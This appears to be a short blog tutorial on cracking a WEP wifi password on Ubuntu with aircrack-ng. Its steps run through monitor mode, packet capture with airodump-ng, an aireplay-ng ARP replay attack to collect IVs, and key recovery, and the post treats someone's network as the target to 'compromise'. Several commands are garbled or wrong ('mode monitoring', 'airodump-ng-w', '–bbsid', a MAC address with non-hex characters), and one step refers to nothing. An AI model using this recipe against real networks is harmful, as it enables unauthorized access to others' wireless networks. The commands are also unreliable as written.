Best wifi hacking tricks 2017 with wifi hacker technique to hack Wifi network in Ubuntu operating system, now see the technique to do this in Ubuntu Operating System.

How to Hack Wifi Passwords in Ubuntu:

[ad type=”banner”]

Step 1: For hacking passwords in Ubuntu, first we have to install air crack program in operating system.

  • Install aircrack

Sudo apt-get install aircrack-ng

Step 2: You need to go in root first. For this purpose type “su –“ and type your password.
Step 3: Now type following command in terminal

Code:

# iwconfig wlan0 mode monitoring

Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.

Step 4: After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:

Code:

# airodump-ng wlan0

Step 5: Once you have created one, abort the process with shortcut key : Ctrl+C. Now there is a need to collect information about the network. Firstly, copy the MAC address of the access point which stands for BSSID (example: 00:11:EH:B8:…..). Another point to be noted is to know the channel and it’s current working. (example: currently working under CH-5). Now , gather information with airodump-ng.

Code:

#airodump-ng-w wep –c 5 –bbsid 00:11:EH:B8:….wlan0

Step 6: Open another terminal to use ARP Reply Attack which increases the amount of data packets and gather the initializing vectors or IV of the chosen access points earlier.

Code:

#Aireplay-ng -3 –b 00:11:EH:B8:….wlan0

Step 7:  Now again move back to the first terminal and have a look at the data packets. Near about 20000 packets have been collected yet. If it is so, abort both airodump-ng and aireplay-ng. To decode the key of wireless network, we are provided with every information. This all can be done with aircrack:

#aircrack-ng wep-03.cap

Categorized in: